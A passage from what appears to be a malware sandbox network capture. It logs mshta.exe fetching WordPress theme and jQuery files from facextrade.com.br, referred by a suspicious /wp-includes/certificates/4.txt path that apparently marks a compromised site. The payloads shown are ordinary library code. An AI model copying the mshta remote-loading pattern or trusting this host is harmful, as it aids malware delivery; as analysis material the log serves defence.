                                        Aug 16, 2022 10:48:49.334218979 CEST840INData Raw: 5b 5c 77 5c 2d 5d 2a 29 24 29 2f 2c 6a 3d 2f 5c 53 2f 2c 6b 3d 2f 5e 5c 73 2b 2f 2c 6c 3d 2f 5c 73 2b 24 2f 2c 6d 3d 2f 5e 3c 28 5c 77 2b 29 5c 73 2a 5c 2f 3f 3e 28 3f 3a 3c 5c 2f 5c 31 3e 29 3f 24 2f 2c 6e 3d 2f 5e 5b 5c 5d 2c 3a 7b 7d 5c 73 5d
                                        Data Ascii: [\w\-]*)$)/,j=/\S/,k=/^\s+/,l=/\s+$/,m=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,n=/^[\],:{}\s]*$/,o=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,p=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,q=/(?:^|:|,)(?:\s*\[)+/g,r=/(webkit)[ \/]([\w.]+
                                        Aug 16, 2022 10:48:49.334247112 CEST841INData Raw: 74 68 3d 31 2c 74 68 69 73 5b 30 5d 3d 68 7d 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 63 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 3d 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 72 65 74 75 72 6e 21 64 7c 7c 64 2e 6a 71 75 65 72 79 3f 28 64 7c 7c 66
                                        Data Ascii: th=1,this[0]=h}this.context=c,this.selector=a;return this}return!d||d.jquery?(d||f).find(a):this.constructor(d).find(a)}if(e.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return e.makeArray(a
                                        Aug 16, 2022 10:48:49.334270000 CEST843INData Raw: 3b 74 79 70 65 6f 66 20 69 3d 3d 22 62 6f 6f 6c 65 61 6e 22 26 26 28 6c 3d 69 2c 69 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 7b 7d 2c 6a 3d 32 29 2c 74 79 70 65 6f 66 20 69 21 3d 22 6f 62 6a 65 63 74 22 26 26 21 65 2e 69 73 46 75 6e 63 74 69
                                        Data Ascii: ;typeof i=="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!="object"&&!e.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){d=i[c],f=a[c];if(i===f)continue;l&&f&&(e.isPlainObject(f)||(g=e.isArray(f)))
                                        Aug 16, 2022 10:48:49.334295034 CEST844INData Raw: 61 72 73 65 46 6c 6f 61 74 28 61 29 29 26 26 69 73 46 69 6e 69 74 65 28 61 29 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 3d 6e 75 6c 6c 3f 53 74 72 69 6e 67 28 61 29 3a 49 5b 43 2e 63 61 6c 6c 28 61 29 5d
                                        Data Ascii: arseFloat(a))&&isFinite(a)},type:function(a){return a==null?String(a):I[C.call(a)]||"object"},isPlainObject:function(a){if(!a||e.type(a)!=="object"||a.nodeType||e.isWindow(a))return!1;try{if(a.constructor&&!D.call(a,"constructor")&&!D.call(a.c
                                        Aug 16, 2022 10:48:49.334319115 CEST846INData Raw: 29 3b 69 66 28 64 29 7b 69 66 28 69 29 7b 66 6f 72 28 66 20 69 6e 20 61 29 69 66 28 63 2e 61 70 70 6c 79 28 61 5b 66 5d 2c 64 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 3b 67 3c 68 3b 29 69 66 28 63 2e 61 70 70 6c 79 28 61
                                        Data Ascii: );if(d){if(i){for(f in a)if(c.apply(a[f],d)===!1)break}else for(;g<h;)if(c.apply(a[g++],d)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(;g<h;)if(c.call(a[g],g,a[g++])===!1)break;return a},trim:G?function(a){retur
                                        Aug 16, 2022 10:48:49.550533056 CEST849INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 63 2c 66 2e 63 6f 6e 63 61 74 28 46 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 7d 3b 67 2e 67 75 69 64 3d 61 2e 67 75 69 64 3d 61 2e 67 75 69 64 7c 7c 67 2e 67 75 69
                                        Data Ascii: ction(){return a.apply(c,f.concat(F.call(arguments)))};g.guid=a.guid=a.guid||g.guid||e.guid++;return g},access:function(a,c,d,f,g,h,i){var j,k=d==null,l=0,m=a.length;if(d&&typeof d=="object"){for(l in d)e.access(a,c,l,d[l],1,h,f);g=1}else if(f
                                        Aug 16, 2022 10:48:49.982420921 CEST938OUTGET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:50.197971106 CEST947INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:46 GMT
                                        Server: Apache
                                        ETag: "a4faba-ce4-58592ec326b80"
                                        Last-Modified: Tue, 02 Apr 2019 21:35:58 GMT
                                        Content-Length: 3300
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664475 15362776
                                        Age: 64
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 6a 73 77 69 6e 67 3d 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 73 77 69 6e 67 3b 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2c 7b 64 65 66 3a 22 65 61 73 65 4f 75 74 51 75 61 64 22 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 64 65 66 5d 28 65 2c 61 2c 63 2c 62 2c 64 29 7d 2c 65 61 73 65 49 6e 51 75 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 61 2f 3d 64 29 2a 61 2b 63 7d 2c 65 61 73 65 4f 75 74 51 75 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 2d 62 2a 28 61 2f 3d 64 29 2a 28 61 2d 32 29 2b 63 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 31 3e 28 61 2f 3d 64 2f 32 29 3f 62 2f 32 2a 61 2a 61 2b 63 3a 2d 62 2f 32 2a 28 2d 2d 61 2a 28 61 2d 32 29 2d 31 29 2b 63 7d 2c 65 61 73 65 49 6e 43 75 62 69 63 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 61 2f 3d 64 29 2a 61 2a 61 2b 63 7d 2c 65 61 73 65 4f 75 74 43 75 62 69 63 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 28 61 3d 61 2f 64 2d 31 29 2a 61 2a 61 2b 31 29 2b 63 7d 2c 65 61 73 65 49 6e 4f 75 74 43 75 62 69 63 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 31 3e 28 61 2f 3d 64 2f 32 29 3f 62 2f 32 2a 61 2a 61 2a 61 2b 63 3a 0a 62 2f 32 2a 28 28 61 2d 3d 32 29 2a 61 2a 61 2b 32 29 2b 63 7d 2c 65 61 73 65 49 6e 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 61 2f 3d 64 29 2a 61 2a 61 2a 61 2b 63 7d 2c 65 61 73 65 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 2d 62 2a 28 28 61 3d 61 2f 64 2d 31 29 2a 61 2a 61 2a 61 2d 31 29 2b 63 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 31 3e 28 61 2f 3d 64 2f 32 29 3f 62 2f 32 2a 61 2a 61 2a 61 2a 61 2b 63 3a 2d 62 2f 32 2a 28 28 61 2d 3d 32 29 2a 61 2a 61 2a 61 2d 32 29 2b 63 7d 2c 65 61 73 65 49 6e 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 61 2f 3d 64 29 2a 61 2a 61 2a 61 2a 61 2b 63 7d 2c 65 61 73 65 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 62 2a 28 28 61 3d 61 2f 64 2d 31 29 2a 61 2a 61 2a 61 2a 61 2b 31 29 2b 63 7d 2c 65 61 73 65 49 6e 4f 75 74 51 75 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 63 2c 62 2c 64 29 7b 72 65 74 75 72 6e 20 31 3e 28 61 2f 3d 64 2f 32 29 3f 62 2f 32 2a 61 2a 61 2a 61 2a 61 2a 61 2b 63 3a
                                        Data Ascii: jQuery.easing.jswing=jQuery.easing.swing;jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,a,c,b,d){return jQuery.easing[jQuery.easing.def](e,a,c,b,d)},easeInQuad:function(e,a,c,b,d){return b*(a/=d)*a+c},easeOutQuad:function(e,a,c,b,d){return-b*(a/=d)*(a-2)+c},easeInOutQuad:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a+c:-b/2*(--a*(a-2)-1)+c},easeInCubic:function(e,a,c,b,d){return b*(a/=d)*a*a+c},easeOutCubic:function(e,a,c,b,d){return b*((a=a/d-1)*a*a+1)+c},easeInOutCubic:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a+c:b/2*((a-=2)*a*a+2)+c},easeInQuart:function(e,a,c,b,d){return b*(a/=d)*a*a*a+c},easeOutQuart:function(e,a,c,b,d){return-b*((a=a/d-1)*a*a*a-1)+c},easeInOutQuart:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a*a+c:-b/2*((a-=2)*a*a*a-2)+c},easeInQuint:function(e,a,c,b,d){return b*(a/=d)*a*a*a*a+c},easeOutQuint:function(e,a,c,b,d){return b*((a=a/d-1)*a*a*a*a+1)+c},easeInOutQuint:function(e,a,c,b,d){return 1>(a/=d/2)?b/2*a*a*a*a*a+c:
                                        Aug 16, 2022 10:48:50.203229904 CEST950OUTGET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:51.336914062 CEST963INHTTP/1.1 404 Not Found
                                        Date: Tue, 16 Aug 2022 08:48:50 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
                                        Content-Type: text/html; charset=UTF-8
                                        X-Varnish: 15664477
                                        Age: 0
                                        Via: 1.1 varnish-v4
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Data Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74
                                        Data Ascii: 00104f<!DOCTYPE html>...[if lt IE 7 ]><html class="ie ie6" lang="pt-BR"> <![endif]-->...[if IE 7 ]><html class="ie ie7" lang="pt-BR"> <![endif]-->...[if IE 8 ]><html class="ie ie8" lang="pt-BR"> <![endif]-->...[if IE 9 ]><html class="ie ie9" lang="pt-BR"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html lang="pt-BR"> ...<![endif]--><head><title>Error 404 Not Found | Facex</title><meta name="description" content=" &raquo; Pgina no encontrada | Facex Comrcio Exterior Ltda." /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11" /><link rel="icon" href="http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico" type="image/x-icon" /><link rel="pingback" href="http://facextrade.com.br/xmlrpc.php" /><link rel="alternate" type="application/rss+xml" title="Facex" href="https://facextrade.com.br/feed/" /><link rel="alt


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        22192.168.2.2249198187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:49.578785896 CEST877OUTGET /wp-content/themes/CherryFramework/style.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:49.790920973 CEST935INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:53 GMT
                                        Server: Apache
                                        ETag: "a52f1b-20b-58592c21db700"
                                        Last-Modified: Tue, 02 Apr 2019 21:24:12 GMT
                                        Content-Length: 523
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22495275 23795413
                                        Age: 56
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 0a 09 54 68 65 6d 65 20 4e 61 6d 65 3a 20 63 68 65 72 72 79 0a 09 54 68 65 6d 65 20 55 52 49 3a 20 2f 2f 69 6e 66 6f 2e 74 65 6d 70 6c 61 74 65 2d 68 65 6c 70 2e 63 6f 6d 2f 68 65 6c 70 2f 0a 09 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 41 20 74 68 65 6d 65 20 66 6f 72 20 57 6f 72 64 70 72 65 73 73 20 33 2e 38 2e 78 0a 09 41 75 74 68 6f 72 3a 20 54 65 6d 70 6c 61 74 65 5f 48 65 6c 70 2e 63 6f 6d 0a 09 41 75 74 68 6f 72 20 55 52 49 3a 20 2f 2f 69 6e 66 6f 2e 74 65 6d 70 6c 61 74 65 2d 68 65 6c 70 2e 63 6f 6d 2f 68 65 6c 70 2f 0a 09 56 65 72 73 69 6f 6e 3a 20 33 2e 31 2e 35 2e 31 0a 09 54 61 67 73 3a 20 64 61 72 6b 2c 20 6c 69 67 68 74 2c 20 77 68 69 74 65 2c 20 62 6c 61 63 6b 2c 20 67 72 61 79 2c 20 6c 65 66 74 2d 73 69 64 65 62 61 72 2c 20 72 69 67 68 74 2d 73 69 64 65 62 61 72 2c 20 66 69 78 65 64 2d 77 69 64 74 68 2c 20 66 6c 65 78 69 62 6c 65 2d 77 69 64 74 68 2c 20 63 75 73 74 6f 6d 2d 6d 65 6e 75 2c 20 65 64 69 74 6f 72 2d 73 74 79 6c 65 2c 20 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 73 2c 20 66 75 6c 6c 2d 77 69 64 74 68 2d 74 65 6d 70 6c 61 74 65 2c 20 70 6f 73 74 2d 66 6f 72 6d 61 74 73 2c 20 72 74 6c 2d 6c 61 6e 67 75 61 67 65 2d 73 75 70 70 6f 72 74 2c 20 73 74 69 63 6b 79 2d 70 6f 73 74 2c 20 74 68 65 6d 65 2d 6f 70 74 69 6f 6e 73 2c 20 74 72 61 6e 73 6c 61 74 69 6f 6e 2d 72 65 61 64 79 0a 09 4c 69 63 65 6e 73 65 3a 0a 09 4c 69 63 65 6e 73 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 0a 09 54 65 78 74 20 44 6f 6d 61 69 6e 3a 20 63 68 65 72 72 79 0a 2a 2f 0a 40 69 6d 70 6f 72 74 20 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3b 0a
                                        Data Ascii: /*Theme Name: cherryTheme URI: //info.template-help.com/help/Description: A theme for Wordpress 3.8.xAuthor: Template_Help.comAuthor URI: //info.template-help.com/help/Version: 3.1.5.1Tags: dark, light, white, black, gray, left-sidebar, right-sidebar, fixed-width, flexible-width, custom-menu, editor-style, featured-images, full-width-template, post-formats, rtl-language-support, sticky-post, theme-options, translation-readyLicense:License URI: http://Text Domain: cherry*/@import "css/style.css";
                                        Aug 16, 2022 10:48:49.963879108 CEST936OUTGET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:50.175616980 CEST939INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:46 GMT
                                        Server: Apache
                                        ETag: "a4fad2-1860-58592f81e2d80"
                                        Last-Modified: Tue, 02 Apr 2019 21:39:18 GMT
                                        Content-Length: 6240
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22495276 15362778
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 6a 2c 63 2c 6c 29 7b 63 2e 66 6e 2e 74 6f 75 63 68 77 69 70 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 6d 69 6e 5f 6d 6f 76 65 5f 78 3a 32 30 2c 6d 69 6e 5f 6d 6f 76 65 5f 79 3a 32 30 2c 77 69 70 65 4c 65 66 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 77 69 70 65 52 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 77 69 70 65 55 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 77 69 70 65 44 6f 77 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 45 76 65 6e 74 73 3a 21 30 7d 3b 61 26 26 63 2e 65 78 74 65 6e 64 28 62 2c 61 29 3b 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 6d 6f 76 65 22 2c 63 29 3b 64 3d 6e 75 6c 6c 3b 6b 3d 21 31 7d 66 75 6e 63 74 69 6f 6e 20 63 28 68 29 7b 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 45 76 65 6e 74 73 26 26 68 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 6b 29 7b 76 61 72 20 66 3d 64 2d 68 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 70 61 67 65 58 3b 68 3d 65 2d 68 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 70 61 67 65 59 3b 4d 61 74 68 2e 61 62 73 28 66 29 3e 3d 62 2e 6d 69 6e 5f 6d 6f 76 65 5f 78 3f 28 61 28 29 2c 30 3c 66 3f 62 2e 77 69 70 65 4c 65 66 74 28 29 3a 62 2e 77 69 70 65 52 69 67 68 74 28 29 29 3a 4d 61 74 68 2e 61 62 73 28 68 29 3e 3d 62 2e 6d 69 6e 5f 6d 6f 76 65 5f 79 26 26 28 61 28 29 2c 0a 30 3c 68 3f 62 2e 77 69 70 65 44 6f 77 6e 28 29 3a 62 2e 77 69 70 65 55 70 28 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 29 7b 31 3d 3d 61 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 26 26 28 64 3d 61 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 70 61 67 65 58 2c 65 3d 61 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 70 61 67 65 59 2c 6b 3d 21 30 2c 74 68 69 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 6d 6f 76 65 22 2c 63 2c 21 31 29 29 7d 76 61 72 20 64 2c 65 2c 6b 3d 21 31 3b 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 74 68 69 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 66 2c 21 31 29 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 65 6c 61 73 74 69 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 24 65 6c 3d 63 28 62 29 3b 74 68 69 73 2e 5f 69 6e 69 74 28 61 29 7d 3b 63 2e 65 6c 61 73 74 69 73 6c 69 64 65 2e 64 65 66 61 75 6c 74 73 3d 7b 73 70 65 65 64 3a 34 35 30 2c 65 61 73 69 6e 67 3a 22 65 61 73 65 4f 75 74 42 61 63 6b 22 2c 69 6d 61 67 65 57 3a 31 39 30 2c 6d 61 72 67 69 6e 3a 33 2c 62 6f 72 64 65 72 3a 32 2c 6d 69 6e 49 74 65 6d 73 3a 31 2c 63 75 72 72 65 6e 74 3a 30 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 7d 3b 63 2e 65 6c 61 73 74 69 73 6c 69 64 65
                                        Data Ascii: (function(j,c,l){c.fn.touchwipe=function(a){var b={min_move_x:20,min_move_y:20,wipeLeft:function(){},wipeRight:function(){},wipeUp:function(){},wipeDown:function(){},preventDefaultEvents:!0};a&&c.extend(b,a);this.each(function(){function a(){this.removeEventListener("touchmove",c);d=null;k=!1}function c(h){b.preventDefaultEvents&&h.preventDefault();if(k){var f=d-h.touches[0].pageX;h=e-h.touches[0].pageY;Math.abs(f)>=b.min_move_x?(a(),0<f?b.wipeLeft():b.wipeRight()):Math.abs(h)>=b.min_move_y&&(a(),0<h?b.wipeDown():b.wipeUp())}}function f(a){1==a.touches.length&&(d=a.touches[0].pageX,e=a.touches[0].pageY,k=!0,this.addEventListener("touchmove",c,!1))}var d,e,k=!1;"ontouchstart"in document.documentElement&&this.addEventListener("touchstart",f,!1)});return this};c.elastislide=function(a,b){this.$el=c(b);this._init(a)};c.elastislide.defaults={speed:450,easing:"easeOutBack",imageW:190,margin:3,border:2,minItems:1,current:0,onClick:function(){return!1}};c.elastislide
